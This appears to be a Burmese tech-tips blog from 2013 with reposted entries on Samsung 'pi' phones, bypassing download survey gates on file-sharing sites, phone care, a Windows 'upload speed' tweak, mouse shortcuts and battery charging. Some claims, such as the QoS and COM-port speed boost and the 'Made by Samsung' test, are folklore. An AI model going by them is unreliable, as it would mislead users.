အဲဒီပေါ်နေတဲ့ပုံပေါ် ကိုယ်ကြိုက်တဲ့ပုံကို Mouse နဲ့ဆွဲထည့်လိုက်ပါ။ ဒါပါပဲ ပုံပြောင်းခြင်းကပြီးသွားပါပြီ။ ဖွင့်ကြည့်လိုက်ပါ။(Ctrl+3)ကိုနှိပ်လိုက်ပါ။ သူ့နဂိုဖိုင်ထဲကိုရောသွားကြည့်လိုက်ပါ။ ကိုယ်ထည့်တဲ့ပုံနဲ့လန်းလို့ရပြီပေါ့နော် 
 
  အောက်ကပုံက Folder ထဲကပုံပါ။

 
Pdf အနေနဲ့သိမ်းထားချင်လျှင် ဒီမှာ ဒေါင်းနော် . . .

အဆင်ပြေပါစေ . . . အဆင်မပြေရင် Comment (or) C-Box မှာပြောခဲ့ပါခင်ဗျာ အတတ်နိုင်ဆုံးအဆင်ပြေအောင်ကြိုးစားပေးပါမယ်
နည်းပညာတက္ကသိုလ်(မကွေး)

Saturday, August 3, 2013

Samsung ချစ်သူများအတွက် သတိထားစရာ



Samsung ချစ်သူများအတွက် သတိထားစရာ
======================

SAMSUNG က အ ရောင်း စင် တာ တ နေ့ ရောက် သွား တော့ SIII နှစ် လုံး ကို ပေါ် တင် ယှဉ် ပြ ထား တယ်။ တစ် လုံး က 420000 နောက် တစ် လုံး က 460000 ။ ဒါ နဲ့ မ ရှင်း လို့ မေး လိုက် တော့။ ဈေး နည်း တဲ့ ၁ လုံး က pi အ လုံး ပါ။ နောက် ၁ လုံး Official အ လုံး ပါတဲ့ ။


pi ဆို တာ ဘာ လဲ လို့ မေး လိုက် တော့ Quality Pass မ ရ တဲ့ အ လုံး SAMSUNG က ထုတ် တဲ့ ဖုန်း တော့ ဟုတ် တယ် ချို့ ယွင်း ချက် အ နည်းငယ် ရှိ တဲ့ ၊ အ ရည် အ သွေး အ နည်း ငယ် နိမ့် တဲ့ ဖုန်း တွေ ပါ တဲ့ ။
သာမန် လူ တော့ မ သိ နိုင် ပါ ဘူး တဲ့။ ယူ ရ တဲ့ ဈေး လည်း မတူ ပါ တဲ့ ။ ။


ဒါဆို တ ချို့ သော ဆိုင် တွေ က pi ဖုန်း တွေ ကို Official ဖုန်း ဈေး နဲ့ ရောင်းတာ တွေ ရှိ မှာ ပေါ့ ။ ရှိ ပါ တယ် ။ ဒါ ကြောင့် လည်း ဖုန်း ချင်း တူ တူ ဈေးနည်း တာ ကိုင် ချင် သူ တွေ အ တွက် ရောင်း ပေး တာ ပါ တဲ့ ။ pi နဲ့ Official ကို ဘယ် လို ခွဲ ရ မ လဲ ဆို တော့ ဘက္ကရီ အောက် က ဖုန်း ကိုယ်ထည် ကို ကြည့် လိုက် ပါ ။


Made in China ပါ Samsung, Made in Vietnam ပါ Samsung စသည် ဖြင့် နိုင် ငံ အ မည် တွေ နဲ့ ဆို ရင် Official ဖုန်း ၊ အဲ ဒီ လို မ ဟုတ် ဘဲ Made by Samsung ဆို ရင် တော့ pi ပါ တဲ့ ခင် ဗျာ ။ ကဲ ၀ယ် ပြီး သား သူ တွေ လည်း ကိုယ့် ဖုန်း ကိုယ် ပြန်ကြည့် ပေ တော့ ဗျာ ။ SAMSUNG Phone Model တိုင်း မှာ pi ရှိ တယ် တဲ့ခင် ဗျာ ။

Creit & Ref ; ဇော်သက်_ MMSD

==========
စာရေးသူကို မယုံလို့တော့ မဟုတ်ပါ Google မှာရှာကြည့်တော့ Samsung မှာ counterfeit ရှိတယ်လို့ Comments တော်တော်များကို တွေ့ရပါတယ်ခင်ဗျာ
ထိုက်တန်တဲ့ဈေးနှုန်းနှင့် ထိုက်တန်သော ကုန်ပစ္စည်းများရကြပါစေ.....

Thursday, July 18, 2013

Survey တွေကိုကျော်ခွ ဖို့အတွက် နည်းလမ်း ၆ မျိုး

အင်တာနက်မှာ ကျနော်တို့ လိုချင်တာတွေဒေါင်းတဲ့အခါ အချို့သော Software တွေက အဖိုးတန်တဲ့အတွက် အလွယ်တကူဒေါင်းမရဘဲ Survey ကျော်ခိုင်းတာမျိုးတွေရှိပါတယ်..အဲလိုကျော်ခိုင်းရင်
ကျော်မရ ခွမရနဲ့ အလွန်အင်မတန်တိုင်ပတ်ပါတယ်..ကဲ အခုဘယ်လိုကျော်ကြမလဲ ဖြစ်နိုင်တဲ့ နည်းလမ်း
ခြောက်ခု တင်ပေးလိုက်ပါတယ်..တစ်နည်းနည်းနဲ့တော့ အိုကီ ပါလိမ့်မယ်..Fileice  , Sharecash တို့ကိုတောင်ကျော်ခွနိုင်ပါတယ်တဲ့.. အင်္ဂလိပ်ဘာသာနဲ့ဘဲ တိုက်ရိုက်တင်ပေးလိုက်ပါတယ်..လွယ်လွယ်လေးပါ..ဖိုင်တွေကို ဒေါင်းလေ့ဒေါင်းထ ရှိတဲ့သူတွေအတွက်
ကတော့ Very Easy ပေါ့ဗျာ..ကဲ စမယ်..ကျနော်လဲ စမ်းနေပြီ..အတူတူစမ်းကြမယ်.. :)

Method 1:-


So Guys here is the first method to do it by simply Login to a site called as Surveybypass.
Just Login to this and copy the survey link which you want to Bypass and the just hit the Go !!! Button after that you get then you get a new link from which you can download the file without any problem.

Note:-This method sometimes not work on some site but don't worry you can try the other Methods.

Method 2:-



So guys here is the second one it is also an online website named as HowtobypassSurveys.Just Open the website and there would be a 1mb Software just download it and run it and then just enter the link you want to bypass the survey and just hit enter you will get a new download link of that file and you can download it without any survey.


Method 3:-



Google Chrome user you can easily Bypass surveys with just a Chrome Plugin.You can download it from Here.Just Download it and install it and it will in the upper right Corner and click it whenever you want to bypass a survey.

Method 4:-


 After Chrome user it's time for Firefox users.You can download the Plugin from Here and easily bypass surveys from it.

Method 5:-


Or you can Disable JavaScript on the browser which will never let the surveys appear.

Google Chrome users:-
1) Click on Settings’ Wrench on the top right of Google Chrome.
2) Click Options.
3) Scroll down, and Click Advanced system Settings
4) Click on Content Settings to show options of Google Chrome web page content.
5) Under JavaScript section check the box: Do not allow any site to run JavaScript
6) Done! Now just go the website that asks for surveys and you’ll bypass them.

Method 6 :-


1) When you are prompted to take a survey, Right Click the title and Click Inspect Element

2) Now keep pressing Delete button to delete scripts on Inspect Element tab, until Complete a Survey disappear

3) After the bar disappear, keep deleting until the Page go lighter (whiten) with no dark area.

4) Done! Now you’ll see your full content or download on Sharecash.

Ref to  www.mmithelper.com

Saturday, July 13, 2013

မိုဘိုင်းဖုန်းအသုံးပြုရာတွင် သတိပြုရမည့်အချက်များ။

 မိုဘိုင်းဖုန်းအသုံးပြုရာတွင် သတိပြုရမည့်အချက်များ။

၁။ ဖုန်းများကို အပူဓာတ်လွန်ကဲမှုမဖြစ်အောင် ထားပါ။

အပူဓာတ်လွန်ကဲမှုသည် ခေတ်မှီ Smartphones များနှင့် tablet များအတွက် အလွန်စိုးရိမ်ရပါတယ်။ Mobile ဖုန်းများကို နေရောင်ခြည်နှင့် တိုက်ရိုက်မထိတွေ့ မိအောင် လက်ကိုင်ပုဝါဖြင့် ဖုံးထားပါ။ ပူပြင်းသော အချိန်တွင် ဖုန်းကို ကားပေါ်တွင် ချန်မထားခဲ့ပါနှင့်၊ မိမိနှင့် တပါးတည်း ယူဆောင်သွားပါ။

၂။ ဖုန်းထဲသို့ ရေမဝင်ပါစေနှင့်။

လျှပ်စစ်ပစ္စည်းများသည် ရေစိုခံ၍မရပါ။ အကယ်၍ သင်၏ ဖုန်း ရေထဲကျသွားပါက ဖုန်းကို လျှင်မြန်စွာ ဆန်ခွက်ထဲသို့ထည့်ထားပါ။ ဖုန်း ပျက်စီးမှုဒဏ်မှလျော့ပါးစေပါတယ်။

၃။ ဖုန်းကို ကြာကြာသုံးပြီး အားသွင်းခြင်းလျှော့ပါ။

ဖုန်းကို တစ်နေကုန် တစ်နေခမ်း အသုံးပြုပြီး အိမ်သို့ပြန်ရောက်ချိန်တွင် ဖုန်းအားသွင်းရန် အချိန်မပေးနိုင်ခြင်း မေ့လျော့ခြင်းများဖြစ်တတ်ပါတယ်။ ဖုန်းအား မရှိပါက သင်၏ တစ်နေ့တာအစီအစဉ်များ ပျက်ယွင်းနိုင်ပါတယ်။ BatteryDoc အစရှိတဲ့ app မျိုးကို ဖုန်းတွင်ထည့်ထားပြီး ဖုန်းအားသွင်းပါက ဖုန်း battery သက်တမ်းပိုမိုကြာရှည်စွာ အသုံးပြုခံပါတယ်။

၎။ ဖုန်းပျောက်ဆုံးပါက ပြန်လည်ရှာဖွေရန်နည်းလမ်း။

ဖုန်းပျောက်ဆုံးခြင်းက လွန်စွာဆိုးရွားတဲ့ဖြစ်ရပ်တစ်ခုပါပဲ။ OS ဖုန်း တော်တော်များများ ပျောက်ဆုံးပါက ပြန်ရှာနိုင်ရန် built in service များထည့်သွင်းထားနိုင်ပါတယ်။ ပျောက်ဆုံးချိန်တွင် ပျင်းရိမနေပဲ လျင်မြန်စွာပြန်ရှာသင့်ပါတယ်။ (အင်တာနက် ကောင်းမွန်ရန် လိုအပ်ပါသည်။)

၅။ ဖုန်း ပွန်းပဲ့ခြင်းမှ ကာကွယ်နိုင်ရန်။

ဖုန်း ကို လက်ထဲမှ လွတ်ကျခြင်းက အမြဲဖြစ်လေ့ရှိကြပါတယ်။ ထိုကဲ့သို့ ထိခိုက်ခြင်းမှ ကာကွယ်နိုင်ရန် scratch protection များထည့်သွင်းသင့်ပါတယ်။ Protectors များတွင် ဈေးနှုန်းချိုသာသော protectors များလည်းရှိပါသည်။ ZAGG invisibleSHIELD နှင့် Armortech ကဲ့သို့သော screen protectors များသည် သင်၏ smartphone မျက်နှာပြင်ကို မတော်တဆထိခိုက်ခြင်းမှ ကာကွယ်ပေးနိုင်ပါတယ်။


http://geekgirlfriends.com/?p=2614 မှ ကောက်နှုတ် ဘာသာပြန်ထားပါသည်။

Friday, July 5, 2013

အင်တာနက် Upload Speed ကို ဒီလိုမြှင့်လိုက်ပါ ( For Windows 7 & 8 )


အင်တာနက်သုံးနေတဲ့သူတွေအနေနဲ့ စိတ်အ၀င်စားဆုံးကိစ္စတွေထဲမှာ အင်တာနက် Download Speed ကို ဘယ်လိုမြှင့်ရမယ်ဆိုတဲ့ ကိစ္စဟာ တစ်ခုအပါအ၀င်ပေါ့ ..

ဒါပေမယ့် .. အဲဒီလိုလူတွေထဲမှာမှ ကိုယ့်ဆီမှာရှိတဲ့ ဖိုင်လေးတွေကို သူငယ်ချင်းတွေကို မျှဝေပေးချင်သူတွေနဲ့ Blogger တွေအဖို့  Upload Speed မြင့်ဖို့ကလည်း တော်တော်အရေးပါတဲ့ ကိစ္စတစ်ခုဖြစ်ပါတယ် ...

ဒီတော့ .. ကွန်နက်ရှင်မကောင်းတဲ့ဒေသမှာနေနေရတဲ့ ကျွန်တော့်အဖို့ ရှာရင်းဖွေရင်း ကလိရင်းနဲ့ အမှန်တကယ် ထရောက်တဲ့ နည်းလေးတစ်ခုကို မျှဝေပေးချင်ပါတယ် ..


ဖိုင်တွေကို Hosting Site တွေမှာ တင်တဲ့အခါ Upload Speed ကို သိသိသာသာမြှင့်ပေးနိုင်မယ့် နည်းလေးတစ်ခုပါ ..

ကဲ .. အဆင့်နှစ်ဆင့်လုပ်ရမယ့်ထဲက ပထမအဆင့်ကို စပါမယ် .. ( ပုံတွေ မထင်ရှားရင် ပုံပေါ်မှာ မောစ်တင်ပေးလိုက်ပါ)





ဝင်းဒိုးကြီးရဲ့ Run Box မှာ gpedit.msc လို့ ရိုက်ထည့်ပြီး Enter နှိပ် ဒါမှမဟုတ်လည်း Ok နှိပ်ပါ
အောက်ကပုံအတိုင်း ပွင့်လာပါမယ်



အဲဒီထဲက Administrative Templates ရဲကရှေ့က မြှားအဖြူလေးကိုနှိပ်လိုက်ပါ
အောက်ပုံအတိုင်း ကျလာပါမယ်








အဲဒီထဲက Network ရဲ့ရှေ့က မြှားအဖြူလေးကို နှိပ်လိုက်ပါ အောက်ကပုံအတိုင်း
ထပ်ကျလာပါမယ်







အဲဒီထဲက Qos packet Schedule ပေါ်မှာနှိပ်ပြီး ဘယ်ဖက်ထဲမှာ ပေါ်လာတဲ့ထဲက Limit reservable bandwidth ပေါ်မှာ Double Click နှိပ်လိုက်ပါ အောက်ကပုံအတိုင်း ၀င်းဒိုးအသစ်တစ်ခု ပွင့်လာပါမယ်



အဲဒီထဲက enable ရဲ့ရှေ့မှာ အမှတ်တပ်ပေးပါ
အောက်မှာရှိနေတဲ့ကိန်းတွေကို ဘယ်လောက်ပဲဖြစ်နေပါစေ 0 ( သုည ) ပြောင်းလိုက်ပါ
ပြီးရင် Ok ကို နှိပ်ပေးလိုက်ပါ ..
ဒီအဆင့်ပြီးတာနဲ့ စက်ကို Restart ချလိုက်ပါ

ဒုတိယအဆင့်ကို မစတင်ခင်မှာ အင်တာနက်လိုင်းကို အရင်ဆုံးချိတ်လိုက်ပါ
ဖုန်းနဲ့ဆိုလည်းဖုန်းနဲ့ ... Wifi နဲ့ဆိုလည်း Wifi နဲ့ပေါ့ ..
အဲဒီလို အင်တာနက်လိုင်း ချိတ်ပြီးသွားပြီဆိုရင်တော့ Control Panel ကို သွားပြီး
Device Manager ကိုဖွင့်ပါ
အောက်ကပုံအတိုင်း ပွင့်လာပါမယ်







အဲဒီထဲက Ports ( COM & LPT ) ရဲကရှေ့က မြှားအဖြူလေးကို နှိပ်လိုက်ပါ
အောက်ကပုံအတိုင်း ကျလာပါမယ်


အဲဒီထဲမှာ COM 1, COM2 ... စသည်ဖြင့် တွေ့ပါလိမ့်မယ် .. ( အင်တာနက်လိုင်းအမျိုးအစားပေါ်မူတည်ပြီး အရေအတွက် မတူပါဘူး )
အဲဒီထဲက တစ်ခုချင်းပေါ်မှာ Double Click နှိပ်လိုက်ရင် ၀င်းဒိုးတစ်ခု ပွင့်လာပါမယ် ..



ပွင့်လာတဲ့ ၀င်းဒိုးထဲက Port Settings ကိုနှိပ်လိုက်ပြီး  Bits per second အကွက်မှာ 128000 ကိုပြောင်းပေးပါ
Flow control အကွက်မှာ none ကနေ Hardware ကို ပြောင်းပေးပါ
ပြီးရင် Ok ကို နှိပ်ပေးလိုက်ပါ
နောက်ထပ် COM 2 ... အဲဒီလို တွေကိုလည်း အပေါ်ကအတိုင်း ပြင်ပေးသွားလိုက်ပါ
အားလုံးအတွက် ပြင်ပေးပြီးသွားရင်တော့ စက်ကို Restart ချပေးလိုက်ပါ
ဝင်းဒိုးပြန်တက်လာတဲ့အခါ အင်တာနက်ချိတ်ဆက်ပြီး ဖိုင်တစ်ဖိုင်လောက်  Upload တင်ကြည့်လိုက်ပါ
တကယ်ပဲ Upload Speed ဟာ သိသိသာသာမြင့်တက်လာတာကို တွေ့ရပါလိမ့်မယ်
ကဲ .. အဆင်ပြေကြပါစေဗျာ..
နည်းပညာတက္ကသိုလ်(မကွေး)


Special Credit To အိုင်တီမုဆိုး

Sunday, June 30, 2013

လူသုံးနည်းသော Mouse အသုံးပြုနည်းလေးတွေ


လူသုံးနည်းတဲ့ Mouse အသုံးပြုနည်း လေးတွေကို ကျွန်တော် တို့သုံးကြည့်ရအောင် ဗျာ။
Shortcut လို့ လည်းခေါ်ကြပါတယ်ဗျာ။
၁။ ဖွင့် ထားသော Tab ကို အလွယ်တကူ ပိတ်နည်း
ဖွင့် ထားတဲ့ Tab တွေကို ပိတ်အောင် Middle Button Scroll Wheel လေးကို သုံးပါမယ်။ ကို ပိတ်ချင် တဲ့ Tab ကလေးကို Mouse Pointer လေးတင်ပြီး Scroll Wheel လေးကို နှိပ်လိုက်ပါ။ ပိတ်သွားပါလိမ့်မယ်။

၂။ Forward (သို့)Backward ကို Button မနှိပ်ပဲ သွားလို့ရတယ် Forward Button / Backward Button မနှိပ်ပဲ Shift ကလေး ဖိထားပြီး Scroll Wheel လေး ရှေ့တိုးနောက် ဆုတ်လုပ်ပြီး သွားလို့ရပါတယ်။
 Shift ကလေး နှိပ်ပြီး Scroll Wheel လေးကို ရှေ့လှည့်ပေးရင် Forward Button နှိပ်လိုက်တာနဲ့အတူတူပါပဲ ။
 Shift ကလေး နှိပ်ပြီး Scroll Wheel လေးကို နောက်လှည့်ပေးရင် Backward Button နှိပ်လိုက်တာနဲ့အတူတူပါပဲ ။

၃။ စာပိုဒ်တွေကို Select ကြမယ်
ကို Select လုပ်ချင်တဲ့ စာပိုဒ်ထဲက စာလုံးတစ်လုံးပေါ်မှာ Mouse သုံးချက်မြန်မြန်လေးနှိပ်လိုက်ပါ။ စာပိုဒ်တစ်ခုလုံးကို Select လုပ်ပေးပါလိမ့်မယ်။

၎။ Zoom ချဲ့မယ်.... ချုံ့မယ်.....
ဒါကတော့ တော်တော်များများ သိပြီးသားဖြစ်မှာပါ။ Ctrl လေးဖိထားပြီး Scroll Wheel လေးကို ရှေ့နောက် လှည့်ကြည့်လိုက်ပါ။


**ဒီMouse အသုံးပြု နည်းတွေက Firefox Browser တွေမှာ စမ်းသပ်ထားတာ ဖြစ်ပါတယ် ။

Credit to ကွန်ပျူတာတက္ကသိုလ်(မကွေး)

အဆင်ပြေပါစေ

Saturday, June 29, 2013

မြန်မာ Blogger ညီအစ်ကိုမောင်နှမများ အတွက် သတင်းကောင်း

မင်္ဂလာပါ

မြန်မာ Blogger ညီအစ်ကိုမောင်နှမများ အတွက် သတင်းကောင်းပါ။

ညီအစ်ကိုတို့ရဲ့ blog URL ကို ကိုယ်ပိုင် Domain သို့ Shwe Hosting မှာပြောင်းလို့ရပါတယ်။ အသေးစိတ်ကို ဒီမှာကြည့်လို့ရပါတယ် http://www.shwehosting.com/domain-for-blog/

Domain ဈေးနှုန်းများနှင့် Domain ရနိုင်၊မရနိုင်ကိုဒီမှာကြည့်လို့ရပါတယ် http://www.shwehosting.com/domain-registration/

http://www.shwehosting.com တွင် Credit ကာဒ် များဖြင့် online တိုက်ရိုက်ဝယ်ယူလို့ရပါတယ်။ ကာဒ်မသုံးရင် မြန်မာပြည်မှာ ပိုက်ဆံပေးဖို့ မြန်မာပြည်ကိုယ်စာလှယ်ကိုဆက်သွယ်လို့ရပါတယ်။ contact us စာမျက်နှာမှာကြည့်ပါ။

အဆင်ပြေပါစေ . . .

ဖုန်းတစ်လုံး အသစ်ဝယ်ပြီး ဘယ်လိုအားသွင်းကြမလဲ


ဖုန်းတစ်လုံး အသစ်ဝယ်ပြီး စသုံးမယ့် အချိန်နဲ့ နောင်အချိန်တွေမှာ

Battery ကိုဘယ်လောက်အချိန်ကြာကြာ အားသွင်းသင့်တယ် ဆိုတာကို


အတော်များများ မသိကျပါဘူး။

ဖုန်းတစ်လုံးဝယ်တော့ ဖုန်းဆိုင်အတော်များများ က စမသုံးခင် 8:00


လောက် အားသွင်းပြီးမှသုံးပါ လို့ မှာတာ အတော်များများ တွေ့ ဖူးတယ်။


ဘာကြောင့် အဲလိုသွင်းရသလဲ ? မေးရင် အတိအကျပြန်မဖြေနိုင်ကျပါဘူး။


အဲဒီတော့ USER တွေက အဲဒီညတစ်ညလုံး အားသွင်းလိုက်ပါရော။


8:00 ဆိုတဲ့ကြာမြင့်မှုက တစ်ညလုံး နီးပါးလောက် ကြာနေတာ ကို။


ဒီမှာတင်ပဲ USER တွေက တစ်ညလုံးအားသွင်းလဲ ကိစ္စမရှိပါဘူး ဆိုတဲ့အတွေး


နဲ့ အလုပ်အား အလုပ်နားတဲ့ အချိန် ညပိုင်းမှာပဲ တစ်ညလုံး အားသွင်းပြီး


အိပ်လေ့ ရှိကျပါတယ်။ မလုပ်သင့်ပါဘူး။ ဖုန်းကလဲ တန်ဘိုးကြီးပဲ Charger ကလဲ


Original အားပြည့်ရင် Auto ဖြတ်တဲ့ စနစ်တွေ ပါတယ် အားပြည့်ရင် Charger တွေက


ဆက်အလုပ်မလုပ် တော့ ဘူး လို့ ထင်နေကျတယ်။


အခြား နိုင်ငံတွေမှာ ဖြစ်နိုင်စွမ်းရှိပေမယ့်မြန်မာနိုင်ငံမှာ တော့ မဖြစ်နိုင်ပါဘူး။


မြန်မာနိုင်ငံမှာ အသုံးပြုနေကျတဲ့ လျှပ်စစ်ထုတ် ပစ္စည်း များအကြောင်း

Electric City ( အိမ်သုံးလျှပ်စစ် )


__မီးလာနေတဲ့ အချိန်တွေမှာ Voltage Loses/ Frequency Loses တွေရှိနေပါတယ်။


__မီးပျက်ရတဲ့ အကြောင်းရင်းတွေက တော့


( 1 ) Over Load ( အလွန်အမင်း အသုံးပြုမှု များနေခြင်း )


( 2 ) Voltage Loses ( ဗို့ အား ကျဆင်းခြင်း )


( 3 ) Frequency Loses ( frequency Hz မတည်ငြိမ်ခြင်း )


အစရှိတဲ့ အကြောင်းအချက်တွေကြောင့် တခါတလေ မှာ LDC ရုံးချုပ်မှ မဖြစ်မနေ ဓါတ်အားဖြတ်တောက်


ရပါတယ်။ မြို့ တွေက ဓါတ်အားပေးခွဲရုံ တွေမှာဆိုရင် System break down / Default စတာတွေဖြစ်ပြီး 


OCB တွေ ပြုတ်ကျတယ်လေ။ OCB ဆိုတာက Oil Circuit Breaker ပါ။

Frequency / Voltage / Ampere တွေက သီအိုရီတွေ အရ တိုက်ရိုက် အချိုးကျ 


သက်ရောက်မှုရှိနေတာကြောင့် ဖုန်းတွေကို တစ်ညလုံး Charging သွင်းခြင်းမှ ရှောင်သင့်ပါတယ်။


Electric Generator ( မီးစက် )


__အိမ်သုံး Generator တွေမှာ Syncronization ဆိုတဲ့ ပြေပြစ် လိုက်လျောညီထွေမှုရှိ အောင် 


ဆွမ်းဆောင်နိုင်တဲ့ System တွေ မပါရှိတာရယ်။ ပါရှိနေသော်ငြားလည်း အပြည့်အဝ 

မစွမ်းဆောင်နိုင်တာရယ်။

__ Hz UV Meter မပါရှိတော့ Frequency ကိုအတိအကျ မသိရှိနိုင်တာရယ်


 စတဲ့ ပြစ်ချက်တွေကြောင့် စိတ်ချရမှု မရှိပြန်ပါဘူး။


Inverter ( Battery မှ လျှပ်စစ်စွမ်းအင် )


__ အိမ်သုံး လျှပ်စစ်ရဲ့ Wave Form က Sine Wave ဖြစ်ပြီး


 Inverter ကထုတ်ပေး တဲ့ Wave Form ကတော့

Square Wave ကို Sine Wave ဖြစ်အောင် ပြောင်းလဲထားတာပါ။ 


နားလည်လွယ်အောင်ပြောရရင်

Sine Wave က ရေလှိုင်းပုံ ရှိပြီး Square Wave က လေးထောင့်စပ်စပ်


ဆိုတော့ Sine Wave နဲ့ တူအောင် ထောင့်ချိုးလေးတွေ ကို အနား သတ်ပေးဘို့ 


AC Output မှာ Resistor နဲ့  Condenser နှစ်လုံးကို


Series ဆက်ပြီး 220V ထွက်တဲ့ Output ကို ခွဆက်ပေးထား တာပါ။ 


အဲဒီတော့ Inverter ကကော စိတ်ချရပါသလား။


______Mobile Phone Battery တွေ ကို ဘယ်လို Charging သွင်းကျမလဲ______



__ Power Saver System ပါတဲ့ ဥပမာ- Nokia 86 8MP ဖုန်းမျိုးစားတွေကတော့ ကြာချိန် 2:30


 လောက်သွင်းသင့်ပါတယ်။

အကြောင်းကတော့ ဖုန်းကို စတင်အသုံးပြု တဲ့ အချိန်ရဲ့ Charging Time ကို Software 


ကမှတ်သားထားပါတယ်။

တကယ်လို့  အဲဒီလို Charging မလုပ်မိဘူးဆိုရင် အဲဒီ Battery က ဘယ်လောက် အားဖြည့်ဖြည့်ြ


ပည့်ပေမယ့် အသုံးမခံတော့ပါဘူး။

__ အခြား ဖုန်းတွေကတော့ ပုံမှန်ပဲ Charging လုပ်ပေးပါ။ 


Battery တစ်လုံးမှာ Charging အကြိမ်ရေ သတ်မှတ်ချက်ရှိပါတယ်။

ဘယ်အမျိုးစားမှာပဲဖြစ်ဖြစ်ပါ။ အဲဒီတော့ Battery ကို အနည်းဆုံး 20% ရောက်မှပဲ Charging 


လုပ်စေချင်ပါတယ်။

__ တစ်ညလုံးအားသွင်းရင် Battery သာမက ဖုန်းပါ ဆုံးရှုံးနိုင်ပါတယ်။



 ပြစ်ချက်တွေကတော့ Charging မရတော့ရင်


Main Power IC/ Aux Power IC လဲရတာတွေထိရှိပြီး တချို့ မှာဆို လုံးဝ ပြုပြင်လို့ မရတော့ပါဘူး။

ဖုန်းအသုံးပြု သူ အားလုံး အသိဥာဏ်ကြွယ်ဝ နိုင်ပါစေလို့  ဆန္ဒ ပြုလိုက်ပါတယ်။

be happy all my fri

Creadit to Ko Soe Win (mobileforum)



ကိုလတ်(ကျွဲဆင်း)